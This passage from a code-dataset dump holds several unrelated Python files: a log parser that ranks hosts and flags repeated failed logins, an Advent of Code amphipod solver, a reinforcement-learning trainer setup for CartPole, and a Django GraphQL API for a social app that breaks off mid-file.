#v2.0 check whether the first item is smaller than the last one; if so the array is increasing\n        #and the first item is returned directly\n        if rotateArray[front] < rotateArray[rear]:\n            return rotateArray[front]\n        else:\n            #use binary search to locate the rotation point\n            while(rear - front)> 1:\n                mid = (rear+front)//2\n                if rotateArray[mid] > rotateArray[rear]:\n                    front = mid\n                elif rotateArray[mid] < rotateArray[front]:\n                    rear = mid\n                elif rotateArray[mid] == rotateArray[front] and rotateArray[front] == rotateArray[rear]:\n                    for i in range(front, rear):\n                        if rotateArray[i] < minVal:\n                            minVal = rotateArray[i]\n                            rear = i\n            minVal = rotateArray[rear]\n            return minVal\n\n\n    #v3.0 instance method 572ms 9032k\n    def minNumberInRotateArray3(self, rotateArray):\n        if len(rotateArray) == 0:\n            return 0\n        front = 0\n        rear = len(rotateArray) - 1\n        midIndex = 0\n        while rotateArray[front] >= rotateArray[rear]:\n            if rear - front == 1:\n                midIndex = rear\n                break\n            midIndex = (front+rear)//2\n            if rotateArray[front] == rotateArray[rear] and rotateArray[front] == rotateArray[midIndex]:\n                return self.MinInOrder(rotateArray, front, rear)\n            if rotateArray[midIndex] >= rotateArray[front]:\n                front = midIndex\n            elif rotateArray[midIndex] <= rotateArray[rear]:\n                rear = midIndex\n        return rotateArray[midIndex]\n\n    # sequential search for the minimum within the subrange\n    def MinInOrder(self, array, front, end):\n        result = array[0]\n        for i in array[front: end+1]:\n            if i < result:\n                result = i\n        return result\n        if len(m)>6:\r\n            nlevel=1 ### 
\r\n iphost = m[0] # ip / hostname\r\n actime = m[3] # access time\r\n crequest = m[4] # resource required by client\r\n cstatus = m[5] # client status\r\n csize = m[6] # object size sent to client\r\n #print(\"iphost, access time, status, size=\",iphost,actime,cstatus,csize)\r\n\r\n rlist = crequest.split()\r\n tlist = actime.split()\r\n if (len(actime)==26)&(len(rlist)>2)&(csize.isdigit()==True)&(len(tlist)==2)&(cstatus.isdigit()==True):\r\n nlevel=2 ###\r\n resource = rlist[1] # 0='GET' 1='/...jpg' 2='HTTP1.0/...'\r\n #print('resource=', resource, ' size=',csize)\r\n status = int(cstatus)\r\n # epoch time\r\n hour1 = tlist[0] # 0='01/Jul/1995:00:00:01' 1='-0400'\r\n #print('hour =', hour1[:-6], end='') # '01/Jul/1995:00'\r\n if len(hour1)==20:\r\n nlevel=3 ###\r\n hour2 = hour1[:-6]\r\n tfmt2 = '%d/%b/%Y:%H:%M:%S' # %b=Jul, Aug, ...\r\n epoch_time = datetime_to_epoch(hour1, tfmt2)\r\n \r\n #else:\r\n #print(\"*** error in convert ***\")\r\n\r\n #else:\r\n #print(\"** error in word parser **\")\r\n\r\n #else:\r\n #print(\"* error in line parser *\")\r\n\r\n #print(nlevel)\r\n if nlevel==3: # ok\r\n #1 hosts.txt\r\n if iphost in fdic1:\r\n n = fdic1[iphost]\r\n del fdic1[iphost]\r\n fdic1[iphost] = n + 1 # Access# n++\r\n else:\r\n fdic1[iphost] = 1 # append the host\r\n \r\n #2 resources.txt\r\n if resource in fdic2:\r\n n = fdic2[resource]\r\n del fdic2[resource]\r\n fdic2[resource] = n + int(csize) # Bandwidth += csize\r\n elif resource != '/':\r\n fdic2[resource] = int(csize) # append the resource\r\n \r\n #3 hours.txt\r\n if hour2 in fdic3:\r\n n = fdic3[hour2]\r\n del fdic3[hour2]\r\n fdic3[hour2] = n + 1 # Access# n++\r\n else:\r\n fdic3[hour2] = 1 # append the hour\r\n\r\n #4 blocked.txt # status=401,HTTP_UNAUTHORIZED \r\n #4-1 release by normal login\r\n if status<400:\r\n for i in range(0, len(blk_host)-1):\r\n if blk_host[i]==iphost: # normal login\r\n blk_host.pop(i)\r\n blk_n.pop(i)\r\n blk_epoch.pop(i)\r\n\r\n #4-2 register by login failure\r\n if status>=400:\r\n if blk_host.count(iphost)==0: # Append new blk_host\r\n blk_host.append(iphost)\r\n blk_n.append(int(1))\r\n blk_epoch.append(epoch_time)\r\n else:\r\n i = blk_host.index(iphost)\r\n blk_n[i] += 1 # Access# n++\r\n if blk_n[i] > 2: # There are 3 times of login failure\r\n if (epoch_time - blk_epoch[i])>20: # 20 second window\r\n blk_host.pop(i)\r\n blk_n.pop(i)\r\n blk_epoch.pop(i)\r\n else:\r\n #4 blocked.txt\r\n with open(fout4,'a') as fw4:\r\n fmt4_msg = '%s: %s\\n' % (iphost, epoch_to_datetime(blk_epoch[i]))\r\n fw4.write(fmt4_msg)\r\n \r\n blk_host.pop(i)\r\n blk_n.pop(i)\r\n blk_epoch.pop(i)\r\n\r\n line = fr.readline()\r\n nline+=1\r\n #if nline>500000: break #=== stop the loop to limit the number of events ===#\r\n # Event Loop: End\r\n\r\n #=== Output Files for Feature 1,2,3\r\n #1 hosts.txt\r\n #sdic1= sorted(fdic1.items(), key=lambda x:x[0], reverse=True) # sort by key\r\n sdic1 = sorted(fdic1.items(), key=itemgetter(1), reverse=True) # sort by value\r\n \r\n with open(fout1,'w') as fw1:\r\n fw1.write('#: hostname, # of access\\n')\r\n n1=0\r\n for k, v in sdic1:\r\n n1+=1\r\n #print(k,v)\r\n fmt1_msg = '%d: %s,%d\\n' % (n1, k, v)\r\n #print(fmt1_msg)\r\n fw1.write(fmt1_msg)\r\n if n1>9: break # Top 10\r\n \r\n #2 resources.txt\r\n sdic2 = sorted(fdic2.items(), key=itemgetter(1), reverse=True) # sort by value\r\n \r\n with open(fout2,'w') as fw2:\r\n fw2.write('#: resource, total bytes\\n')\r\n n2=0\r\n for k, v in sdic2:\r\n n2+=1\r\n #print(k,v)\r\n fmt2_msg = '%d: %s,%d\\n' % (n2, k, v)\r\n 
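# Aside: the sort-then-truncate pattern used for these Top-10 reports can also be written with
# heapq.nlargest, which avoids fully sorting the dictionary (a sketch with made-up data):
import heapq

counts = {'host-a': 42, 'host-b': 7, 'host-c': 99}
for rank, (key, value) in enumerate(heapq.nlargest(10, counts.items(), key=lambda kv: kv[1]), 1):
    print('%d: %s,%d' % (rank, key, value))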
#print(fmt2_msg)\r\n fw2.write(fmt2_msg)\r\n if n2>9: break # Top 10\r\n \r\n #3 hours.txt\r\n sdic3 = sorted(fdic3.items(), key=itemgetter(1), reverse=True) # sort by value\r\n \r\n with open(fout3,'w') as fw3:\r\n fw3.write('#: date:hour, # of access in 60 minutes\\n')\r\n n3=0\r\n for k, v in sdic3:\r\n n3+=1\r\n #print(k,v)\r\n fmt3_msg = '%d: %s,%d\\n' % (n3, k, v)\r\n #print(fmt3_msg)\r\n fw3.write(fmt3_msg)\r\n if n3>9: break # Top 10\r\n\r\n #4 blocked.txt\r\n # this file is written in the event loop.\r\n\r\n return name \r\n\r\n# Main Routine: Begin\r\nfilename='./log_input/log.txt' # Input filename\r\nf1='./log_output/hosts.txt' # Feature 1: top 10 most active hosts/IP addresses that have accessed the site\r\nf2='./log_output/resources.txt' # Feature 2: top 10 resources on the site that consume the most bandwidth\r\nf3='./log_output/hours.txt' # Feature 3: the site’s 10 busiest 60-minute period3\r\nf4='./log_output/blocked.txt' # Feature 4: hosts of three consecutive failed login attempts over 20 seconds\r\nlog_parser(filename,f1,f2,f3,f4)\r\n\r\ninput(\"Hit any key to End.\") #=== stopper for Python on Windows ===#\r\n# Main Routine: End\r\n","repo_name":"Masa4649/Insight-Data-Challenge-2017-Apr","sub_path":"src/process_log_MN.py","file_name":"process_log_MN.py","file_ext":"py","file_size_in_byte":8409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"46881253234","text":"from collections import *\nfrom typing import *\nfrom heapq import *\nfrom dataclasses import dataclass\nfrom enum import Enum\nfrom puzzle import PuzzleContext\n\n\nclass Amphipod(Enum):\n A = (2, 1)\n B = (4, 10)\n C = (6, 100)\n D = (8, 1000)\n\n @property\n def target_pos(self) -> int:\n return self.value[0]\n\n @property\n def movement_cost(self) -> int:\n return self.value[1]\n\n def __lt__(self, other) -> bool:\n return self.value < other.value\n\n\n@dataclass(order=True)\nclass Room:\n pos: int\n max_size: int\n amphipods: List[Amphipod]\n\n def copy(self) -> \"Room\":\n return Room(self.pos, self.max_size, self.amphipods.copy())\n\n def pop(self) -> Optional[Amphipod]:\n try:\n return self.amphipods.pop()\n except IndexError:\n return None\n\n def has_space(self) -> bool:\n return len(self.amphipods) < self.max_size\n\n def is_empty(self) -> bool:\n return len(self.amphipods) == 0\n\n def all_same(self) -> bool:\n return len(self.amphipods) == 0 or all(\n a == self.amphipods[0] for a in self.amphipods\n )\n\n def all_ok(self) -> bool:\n return all(a.target_pos == self.pos for a in self.amphipods)\n\n def __hash__(self) -> int:\n return hash((self.pos, tuple(self.amphipods)))\n\n@dataclass\nclass Hallway:\n pos: int\n amphipod: Optional[Amphipod]\n\n def copy(self) -> \"Hallway\":\n return Hallway(self.pos, self.amphipod)\n\n def __hash__(self) -> int:\n return hash((self.pos, self.amphipod))\n\n def __lt__(self, other) -> bool:\n a = self.amphipod.value if self.amphipod else (0, 0)\n b = other.amphipod.value if other.amphipod else (0, 0)\n return (self.pos, a) < (other.pos, b)\n\n\n@dataclass(order=True)\nclass State:\n cells: List[Union[Hallway, Room]]\n\n def is_terminal(self) -> bool:\n for c in self.cells:\n if isinstance(c, Hallway) and c.amphipod is not None:\n return False\n if isinstance(c, Room) and not c.all_ok():\n return False\n return True\n\n def draw(self) -> str:\n width = len(self.cells)+2\n height = max(c.max_size for c in self.cells if isinstance(c, Room)) + 3\n grid = [[\" \" for _ in range(width)] for _ in 
range(height)]\n\n for j in range(0, width):\n grid[0][j] = \"#\"\n grid[1][0] = \"#\"\n for c in self.cells:\n if isinstance(c, Hallway):\n grid[1][1+c.pos] = \".\" if c.amphipod is None else c.amphipod.name\n elif isinstance(c, Room):\n grid[1][1+c.pos] = \".\"\n for i, cc in enumerate(c.amphipods):\n grid[height-2-i][1+c.pos] = cc.name\n for i in range(len(c.amphipods), c.max_size):\n grid[height-2-i][1+c.pos] = \".\"\n for j in range(0, width):\n if grid[2][j] == \" \":\n grid[2][j] = \"#\"\n for j in range(2, width-2):\n if grid[3][j] == \" \":\n grid[3][j] = \"#\"\n grid[1][-1] = \"#\"\n for j in range(2, width-2):\n grid[-1][j] = \"#\"\n\n return \"\\n\".join([\"\".join(r) for r in grid])\n\n\n def get_next(self) -> Iterable[Tuple[\"State\", int]]:\n for i, c in enumerate(self.cells):\n if isinstance(c, Hallway):\n if c.amphipod is None:\n continue\n # move to some room\n for j in reversed(range(0, i)):\n cc = self.cells[j]\n if isinstance(cc, Hallway) and cc.amphipod is not None:\n break\n if isinstance(cc, Room) and cc.has_space() and cc.all_ok() and c.amphipod.target_pos == cc.pos:\n new_cells = [c.copy() for c in self.cells]\n new_cells[i].amphipod = None\n new_cells[j].amphipods.append(c.amphipod)\n yield State(new_cells), (abs(j-i)+(cc.max_size-len(cc.amphipods)))*c.amphipod.movement_cost\n for j in range(i+1, len(self.cells)):\n cc = self.cells[j]\n if isinstance(cc, Hallway) and cc.amphipod is not None:\n break\n if isinstance(cc, Room) and cc.has_space() and cc.all_ok() and c.amphipod.target_pos == cc.pos:\n new_cells = [c.copy() for c in self.cells]\n new_cells[i].amphipod = None\n new_cells[j].amphipods.append(c.amphipod)\n yield State(new_cells), (abs(j-i)+(cc.max_size-len(cc.amphipods)))*c.amphipod.movement_cost\n \n elif isinstance(c, Room):\n if c.is_empty():\n continue\n # move to some hallway\n for j in reversed(range(0, i)):\n cc = self.cells[j]\n if isinstance(cc, Hallway):\n if cc.amphipod is not None:\n break\n new_cells = [c.copy() for c in self.cells]\n a = new_cells[i].pop()\n new_cells[j].amphipod = a\n yield State(new_cells), (abs(j-i)+(c.max_size-len(c.amphipods)+1))*a.movement_cost\n \n for j in range(i+1, len(self.cells)):\n cc = self.cells[j]\n if isinstance(cc, Hallway):\n if cc.amphipod is not None:\n break\n new_cells = [c.copy() for c in self.cells]\n a = new_cells[i].pop()\n new_cells[j].amphipod = a\n yield State(new_cells), (abs(j-i)+(c.max_size-len(c.amphipods)+1))*a.movement_cost\n \n\n def __hash__(self) -> int:\n return hash(tuple(self.cells))\n\n @classmethod\n def parse(cls, s: str) -> \"State\":\n lines = s.split(\"\\n\")\n height = len(lines)\n width = len(lines[0])\n assert lines[0] == \"#\"*width\n assert lines[1] == \"#\"+\".\"*(width-2)+\"#\"\n\n room_size = height-3\n cells = [\n Hallway(0, None),\n Hallway(1, None),\n Room(2, room_size, []),\n Hallway(3, None),\n Room(4, room_size, []),\n Hallway(5, None),\n Room(6, room_size, []),\n Hallway(7, None),\n Room(8, room_size, []),\n Hallway(9, None),\n Hallway(10, None),\n ]\n for j in [3, 5, 7, 9]:\n for i in reversed(range(2, height-1)):\n cells[j-1].amphipods.append(Amphipod[lines[i][j]])\n\n return State(cells)\n\n\ndef dijkstra(start: State) -> int:\n pq = []\n costs = defaultdict(lambda: 10**100)\n\n heappush(pq, (0, start))\n costs[start] = 0\n while pq:\n d, u = heappop(pq)\n if d > costs[u]:\n continue\n if u.is_terminal():\n return costs[u]\n for v, c in u.get_next():\n if costs[u] + c < costs[v]:\n costs[v] = costs[u] + c\n heappush(pq, (costs[v], v))\n\n\nwith 
PuzzleContext(year=2021, day=23) as ctx:\n start = State.parse(ctx.data)\n ans1 = dijkstra(start)\n ctx.submit(1, ans1)\n\n lines = ctx.nonempty_lines\n lines = lines[:3] + [\" #D#C#B#A# \", \" #D#B#A#C# \"] + lines[3:]\n start = State.parse(\"\\n\".join(lines))\n ans2 = dijkstra(start)\n ctx.submit(2, ans2)\n","repo_name":"vstrimaitis/aoc-2021","sub_path":"python/23/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":7533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5227687128","text":"def build_iac_trainer(\n config,\n env: MultiAgentEnv,\n models: Dict[str, nn.Module],\n):\n policy_config = config[\"policy\"]\n executing_config = config[\"executing\"]\n\n critic_lr = policy_config[\"critic_lr\"]\n actor_lr = policy_config[\"actor_lr\"]\n discount_factor = policy_config[\"discount_factor\"]\n update_period = policy_config[\"update_period\"]\n advg_type = policy_config[\"advg_type\"]\n\n logger.info(\"create IAC trainer\")\n logger.info(\"\\t critic lr : %f\", critic_lr)\n logger.info(\"\\t discount factor : %f\", discount_factor)\n logger.info(\"\\t update period : %d\", update_period)\n\n agents_id = env.agents_id\n loss_fn = nn.MSELoss()\n policies = {}\n for id in agents_id:\n model = models[id]\n critic_net = model[\"critic_net\"]\n critic_target_net = model[\"critic_target_net\"]\n actor_net = model[\"actor_net\"]\n action_space = policy_config[\"action_space\"][id]\n state_space = policy_config[\"state_space\"][id]\n policies[id] = ActorCritic(\n critic_net=critic_net,\n critic_target_net=critic_target_net,\n actor_net=actor_net,\n critic_lr=critic_lr,\n actor_lr=actor_lr,\n discount_factor=discount_factor,\n update_period=update_period,\n action_space=action_space,\n state_space=state_space,\n critic_loss_fn=loss_fn,\n advantage_type=advg_type,\n )\n\n recorder = Printer()\n if executing_config[\"recording\"]:\n recorder = TorchRecorder(executing_config[\"record_base_dir\"])\n logger.info(\"\\t training will be recorded\")\n trainer = IOnPolicyTrainer(\n type=PolicyTypes.IAC,\n policies=policies,\n env=env,\n recorder=recorder,\n config=executing_config,\n )\n return trainer\n\n\ndef get_ac_test_setting():\n critic_lr = 1e-3\n actor_lr = 1e-3\n batch_size = 16\n discount_factor = 0.99\n update_period = 100\n action_space = 2\n state_space = 4\n advg_type = AdvantageTypes.RewardToGO\n policy_config = {\n \"critic_lr\": critic_lr,\n \"actor_lr\": actor_lr,\n \"discount_factor\": discount_factor,\n \"update_period\": update_period,\n \"advg_type\": advg_type,\n \"action_space\": {},\n \"state_space\": {},\n }\n buffer_config = {}\n exec_config = {\n \"batch_size\": batch_size,\n \"recording\": True,\n \"ckpt_frequency\": 0,\n \"record_base_dir\": \"records/gym_test\",\n }\n trainner_config = {\n \"type\": PolicyTypes.IAC,\n \"executing\": exec_config,\n \"policy\": policy_config,\n \"buffer\": buffer_config,\n }\n actor_net = CartPolePG(\n input_space=state_space,\n output_space=action_space,\n )\n\n critic_net = CartPole(\n input_space=state_space,\n output_space=action_space,\n )\n\n critic_target_net = CartPole(\n input_space=state_space,\n output_space=action_space,\n )\n\n model = {\n \"actor_net\": actor_net,\n \"critic_net\": critic_net,\n \"critic_target_net\": critic_target_net,\n }\n\n return trainner_config, model\n\n\nclass CartPolePG(nn.Module):\n def __init__(self, input_space, output_space) -> None:\n super(CartPolePG, self).__init__()\n self.fc1 = nn.Linear(input_space, 16)\n self.fc2 = 
nn.Linear(16, 8)\n self.fc3 = nn.Linear(8, output_space)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n action = F.softmax(self.fc3(x), dim=-1)\n return action\n\n\nclass CartPole(nn.Module):\n def __init__(self, input_space, output_space) -> None:\n super(CartPole, self).__init__()\n self.fc1 = nn.Linear(input_space, 24)\n self.fc2 = nn.Linear(24, 24)\n self.fc3 = nn.Linear(24, output_space)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n action = self.fc3(x)\n return action\n","repo_name":"AmoyZhp/traffic_light_control","sub_path":"traffic_light_control/hprl/trainer/builder/iac.py","file_name":"iac.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15040371520","text":"import graphene\nfrom graphene_django import DjangoObjectType\nfrom graphene_file_upload.scalars import Upload\nfrom api.models import *\nfrom api.token import *\nfrom graphene import relay, Node\nfrom graphql import GraphQLError\n\n\nclass UserType(DjangoObjectType):\n class Meta:\n model = UserModel\n\n\nclass PostType(DjangoObjectType):\n class Meta:\n model = PostModel\n\n\nclass PictureType(DjangoObjectType):\n class Meta:\n model = PictureModel\n\n\nclass FollowType(DjangoObjectType):\n class Meta:\n model = FollowModel\n\n\nclass LikeType(DjangoObjectType):\n class Meta:\n model = LikeModel\n\n\nclass CommentType(DjangoObjectType):\n class Meta:\n model = CommentModel\n\n\nclass HistoryType(DjangoObjectType):\n class Meta:\n model = HistoryModel\n\n\nclass ChatroomType(DjangoObjectType):\n class Meta:\n model = ChatroomModel\n\n\nclass MessageType(DjangoObjectType):\n class Meta:\n model = MessageModel\n\n\nclass Query(graphene.ObjectType):\n users = graphene.List(UserType,\n kakaoID=graphene.Int(),\n username=graphene.String(),\n accessToken=graphene.String(),\n search=graphene.Int(),\n )\n\n posts = graphene.List(PostType,\n username=graphene.String(),\n accessToken=graphene.String(required=True),\n record=graphene.Int(),\n )\n\n pics = graphene.List(PictureType,\n record=graphene.Int(),\n username=graphene.String(),\n accessToken=graphene.String(required=True),\n )\n\n follows = graphene.List(FollowType,\n accessToken=graphene.String(required=True),\n username=graphene.String(),\n choice=graphene.Int(),\n )\n\n likes = graphene.List(LikeType,\n accessToken=graphene.String(required=True),\n typeinfo=graphene.String(required=True),\n record=graphene.Int(required=True),\n username=graphene.String(),\n )\n\n comments = graphene.List(CommentType,\n accessToken=graphene.String(required=True),\n record=graphene.Int(required=True),\n parent=graphene.Int(),\n )\n\n histories = graphene.List(HistoryType,\n accessToken=graphene.String(required=True),\n )\n\n chatrooms = graphene.List(ChatroomType,\n accessToken=graphene.String(required=True),\n username=graphene.String(),\n )\n\n messages = graphene.List(MessageType,\n accessToken=graphene.String(required=True),\n username=graphene.String(required=True),\n )\n\n def resolve_users(self, info, kakaoID=None, username=None, accessToken=None, search=None):\n query = UserModel.objects.all()\n\n if kakaoID:\n return UserModel.objects.filter(kakaoID=kakaoID)\n\n if search == 1:\n return UserModel.objects.filter(name__icontains=username)\n\n elif username:\n return UserModel.objects.filter(name=username)\n\n elif accessToken:\n kakaoID = get_kakaoID(accessToken)\n if kakaoID is not None:\n return 
UserModel.objects.filter(kakaoID=kakaoID)\n else:\n return query\n\n def resolve_posts(self, info, username=None, accessToken=None, record=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not Permitted\")\n\n if record:\n posts = PostModel.objects.filter(user__kakaoID=kakaoID, post_id=record)\n return posts\n\n if username:\n posts = PostModel.objects.filter(user__name=username).order_by('date').reverse()\n return posts\n\n else:\n posts = PostModel.objects.filter(user__name=UserModel.objects.get(kakaoID=kakaoID))\n for following in list(FollowModel.objects.filter(user_from__kakaoID=kakaoID).values(\"user_to_id\")):\n posts |= PostModel.objects.filter(user__name=UserModel.objects.get(user_id=following[\"user_to_id\"]))\n return posts.order_by('date').reverse()\n\n def resolve_pics(self, info, username=None, record=None, accessToken=None):\n if record:\n return PictureModel.objects.filter(record_id=record)\n\n elif username:\n return PictureModel.objects.filter(\n record_id__in=PostModel.objects.filter(user__name=username).values('post_id')).order_by(\n 'pic_id').reverse()\n\n else:\n kakaoID = get_kakaoID(accessToken)\n if kakaoID is None:\n raise GraphQLError(\"Not Permitted\")\n\n return PictureModel.objects.filter(\n record_id__in=PostModel.objects.filter(user__kakaoID=kakaoID).values('post_id')).order_by(\n 'pic_id').reverse()\n\n def resolve_follows(self, info, accessToken, username=None, choice=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not Permitted\")\n\n if username is not None:\n follow = FollowModel.objects.filter(user_from__kakaoID=kakaoID, user_to__name=username)\n return follow\n\n else:\n if choice == 1:\n return FollowModel.objects.filter(user_to__kakaoID=kakaoID)\n elif choice == 2:\n return FollowModel.objects.filter(user_from__kakaoID=kakaoID)\n else:\n raise GraphQLError(\"Error\")\n\n def resolve_likes(self, info, accessToken, typeinfo, record, username=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not permitted\")\n\n likes = LikeModel.objects.filter(type=typeinfo, record_id=record, user_from__kakaoID=kakaoID)\n return likes\n\n def resolve_comments(self, info, accessToken, record, parent=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not permitted\")\n\n if parent is not None:\n comments = CommentModel.objects.filter(post_id=record, parent=parent)\n else:\n comments = CommentModel.objects.filter(post_id=record)\n return comments\n\n def resolve_histories(self, info, accessToken):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not permitted\")\n\n histories = HistoryModel.objects.filter(user__kakaoID=kakaoID).order_by(\"date\").reverse()\n return histories\n\n def resolve_chatrooms(self, info, accessToken, username=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not permitted\")\n\n if username:\n chatrooms = ChatroomModel.objects.filter(user_from__kakaoID=kakaoID, user_to__name=username)\n chatrooms |= ChatroomModel.objects.filter(user_to__kakaoID=kakaoID, user_from__name=username)\n return chatrooms\n\n chatrooms = ChatroomModel.objects.filter(user_from__kakaoID=kakaoID)\n chatrooms |= ChatroomModel.objects.filter(user_to__kakaoID=kakaoID)\n return chatrooms\n\n def resolve_messages(self, info, accessToken, username):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not 
permitted\")\n\n try:\n chatroom = ChatroomModel.objects.get(user_from__kakaoID=kakaoID, user_to__name=username)\n except:\n try:\n chatroom = ChatroomModel.objects.get(user_to__kakaoID=kakaoID, user_from__name=username)\n except:\n raise GraphQLError(\"Not permitted\")\n\n messages = MessageModel.objects.filter(chatroom_id=chatroom.chatroom_id)\n return messages\n\n\nclass CreateUser(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n name = graphene.String(required=True)\n kakaoID = graphene.Int(required=True)\n accessToken = graphene.String(required=True)\n\n def mutate(self, info, name, kakaoID, accessToken):\n if verify_kakaoToken(accessToken, kakaoID):\n try:\n user = UserModel.objects.get(kakaoID=kakaoID)\n except:\n user = UserModel(name=name, kakaoID=kakaoID)\n user.save()\n return CreateUser(success=True)\n return CreateUser(success=False)\n\n\nclass UploadProfile(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n img = Upload(required=True)\n accessToken = graphene.String(required=True)\n\n def mutate(self, info, img, accessToken):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return UploadProfile(success=False)\n\n User = UserModel.objects.get(kakaoID=kakaoID)\n img.name = str(kakaoID) + \"_\" + img.name\n User.profile.delete()\n User.profile = img\n User.save()\n return UploadProfile(success=True)\n\n\nclass EditProfile(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n img = Upload()\n name = graphene.String()\n text_comment = graphene.String()\n is_open = graphene.Boolean()\n\n def mutate(self, info, accessToken, img=None, name=None, text_comment=None, is_open=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return EditProfile(success=False)\n\n try:\n User = UserModel.objects.get(kakaoID=kakaoID)\n if img:\n img.name = str(kakaoID) + \"_\" + img.name\n User.profile.delete()\n User.profile = img\n if name:\n User.name = name\n if text_comment:\n User.text_comment = text_comment\n if is_open:\n User.is_open = is_open\n\n User.save()\n return EditProfile(success=True)\n\n except:\n return EditProfile(success=False)\n\n\nclass AddPost(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n img = Upload(required=True)\n place = graphene.String()\n hashtag = graphene.String()\n allow_comment = graphene.Boolean()\n comment = graphene.String()\n\n def mutate(self, info, accessToken, img, place=\"\", allow_comment=True, comment=\"\", hashtag=None):\n if not img:\n return AddPost(success=False)\n\n kakaoID = get_kakaoID(accessToken)\n if kakaoID is None:\n return AddPost(success=False)\n\n user = UserModel.objects.get(kakaoID=kakaoID)\n\n post = PostModel(user=user, allow_comment=allow_comment, place=place, like_count=0, text_comment=comment)\n post.save()\n record_id = post.post_id\n\n pic = PictureModel(pic=img, type='P', record_id=record_id, pic_idx=0)\n pic.save()\n\n user.post_count = user.post_count + 1\n user.save()\n\n if hashtag is not None:\n hash = HashtagModel(tag_name=hashtag, type='P', record_id=record_id)\n hash.save()\n\n return AddPost(success=True)\n\n\nclass EditPost(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n place = graphene.String()\n comment = graphene.String()\n\n def mutate(self, info, accessToken, record, place=None, 
comment=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return EditPost(success=False)\n\n user = UserModel.objects.get(kakaoID=kakaoID)\n try:\n post = PostModel.objects.get(user=user, post_id=record)\n except:\n return EditPost(success=False)\n\n post.text_comment = comment\n post.place = place\n post.save()\n return EditPost(success=True)\n\n\nclass RemovePost(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return RemovePost(success=False)\n\n user = UserModel.objects.get(kakaoID=kakaoID)\n try:\n post = PostModel.objects.get(user=user, post_id=record)\n except:\n return RemovePost(success=False)\n\n try:\n PictureModel.objects.get(record_id=record, type='P').delete()\n except:\n pass\n\n try:\n comments = CommentModel.objects.filter(post_id=record)\n try:\n likes = LikeModel.objects.filter(record_id__in=comments, type='C').delete()\n except:\n pass\n comments.delete()\n except:\n pass\n\n try:\n LikeModel.objects.filter(record_id=record, type='P').delete()\n except:\n pass\n\n post.delete()\n\n user.post_count -= 1\n user.save()\n return RemovePost(success=True)\n\n\nclass addFollow(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n fkakaoID = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, fkakaoID):\n kakaoID = get_kakaoID(accessToken)\n if kakaoID is None:\n return addFollow(success=False)\n\n if kakaoID == fkakaoID:\n return addFollow(success=False)\n\n try:\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n user_to = UserModel.objects.get(kakaoID=fkakaoID)\n except:\n return addFollow(success=False)\n\n history = FollowModel.objects.filter(user_from__kakaoID=kakaoID, user_to__kakaoID=fkakaoID)\n if history.exists():\n return addFollow(success=False)\n\n else:\n follow = FollowModel(user_from=user_from, user_to=user_to)\n follow.save()\n\n addHistory = HistoryModel(user=user_to, type='F', record_id=follow.follow_id)\n addHistory.save()\n\n user_to.follower_count += 1\n user_to.save()\n\n user_from.following_count += 1\n user_from.save()\n return addFollow(success=True)\n\n\nclass unFollow(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n fkakaoID = graphene.Int(required=True)\n choice = graphene.Int()\n\n def mutate(self, info, accessToken, fkakaoID, choice=None):\n kakaoID = get_kakaoID(accessToken)\n if kakaoID is None:\n return addFollow(success=False)\n\n if kakaoID == fkakaoID:\n return addFollow(success=False)\n\n try:\n if choice == None:\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n user_to = UserModel.objects.get(kakaoID=fkakaoID)\n history = FollowModel.objects.filter(user_from__kakaoID=kakaoID, user_to__kakaoID=fkakaoID)\n if not history.exists():\n return addFollow(success=False)\n else:\n user_from = UserModel.objects.get(kakaoID=fkakaoID)\n user_to = UserModel.objects.get(kakaoID=kakaoID)\n history = FollowModel.objects.filter(user_from__kakaoID=fkakaoID, user_to__kakaoID=kakaoID)\n if not history.exists():\n return addFollow(success=False)\n except:\n return addFollow(success=False)\n\n else:\n history.delete()\n\n user_to.follower_count -= 1\n user_to.save()\n\n user_from.following_count -= 1\n user_from.save()\n return addFollow(success=True)\n\n\nclass 
